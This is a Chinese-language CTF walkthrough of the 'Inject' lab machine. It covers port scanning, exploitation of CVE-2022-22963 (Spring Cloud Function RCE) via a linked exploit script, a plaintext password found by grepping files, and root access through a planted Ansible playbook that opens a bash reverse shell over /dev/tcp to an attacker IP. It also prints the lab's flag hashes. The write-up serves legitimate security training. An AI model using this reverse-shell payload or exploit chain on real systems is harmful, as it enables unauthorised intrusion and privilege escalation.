[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限
Information GatheringIP AddressOpening Ports10.10.11.204TCP:22,8080 $ ip='10.10.11.204'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e Target $ip is up, scanning ports...\e; then echo -e "\e Open ports found on $ip: $ports\e No open ports found on $ip.\e Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
| 256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp opennagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
LFI && Spring Cloud RCE
http://10.10.11.204:8080
https://i-blog.csdnimg.cn/img_convert/e521e6f60716bfe1f0aaa571199defb2.jpeg
$ feroxbuster -u 'http://10.10.11.204:8080/'
https://i-blog.csdnimg.cn/img_convert/2461d33787f48dc3779e0aa6bcac9184.jpeg
http://10.10.11.204:8080/upload
https://i-blog.csdnimg.cn/img_convert/6491bafe43b9f41e195f30f2a24bdc47.jpeg
https://i-blog.csdnimg.cn/img_convert/95d9e0c6fdc3a87164548a6b8a94b80f.jpeg
https://i-blog.csdnimg.cn/img_convert/72ae5cb33dd587078b6ed83493658ebc.jpeg
https://www.cvedetails.com/cve/CVE-2022-22963/
https://github.com/J0ey17/CVE-2022-22963_Reverse-Shell-Exploit
$ python3 exp.py -u 'http://10.10.11.204:8080'
https://i-blog.csdnimg.cn/img_convert/07500911abff53ae5d3d65085cc99ab8.jpeg
https://github.com/MartinxMax/trp00f
$ grep -iR password 2>/dev/null
https://i-blog.csdnimg.cn/img_convert/6f9f07d57972426561ffce684e23961f.jpeg
Username:phil
Passowrd:DocPhillovestoInject123
https://i-blog.csdnimg.cn/img_convert/2ca7aebdf5515d1b7c50c71b40db5ca1.jpeg
User.txt
94e7dcdca61b2d4d6d8256039e213074
Privilege Escalation:Ansible playbook
通过pspy64监控,得到/usr/local/bin/ansible-parallel执行了/opt/automation/tasks/*.yml任务
https://i-blog.csdnimg.cn/img_convert/17ff4946719224961f263dcd8b12c79f.jpegplaybook_1.yml 文件是一个 Ansible Playbook,它的作用是确保 webapp 服务在本地(localhost)运行,并设置为开机自启。
https://i-blog.csdnimg.cn/img_convert/91a3cbb858e3a4f3792b34a5826ee73e.jpeg
编写恶意yml载荷到
/opt/automation/tasks/playbook_2.yml
- hosts: localhost
tasks:
- name: Checking webapp service
shell: bash -c 'bash -i >& /dev/tcp/10.10.16.28/443 0>&1'
https://i-blog.csdnimg.cn/img_convert/48766c519196d5c3c4c8cf0a67b1c66e.jpeg
Root.txt
5e375fdba1d1771e97cf1af837801f0e
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]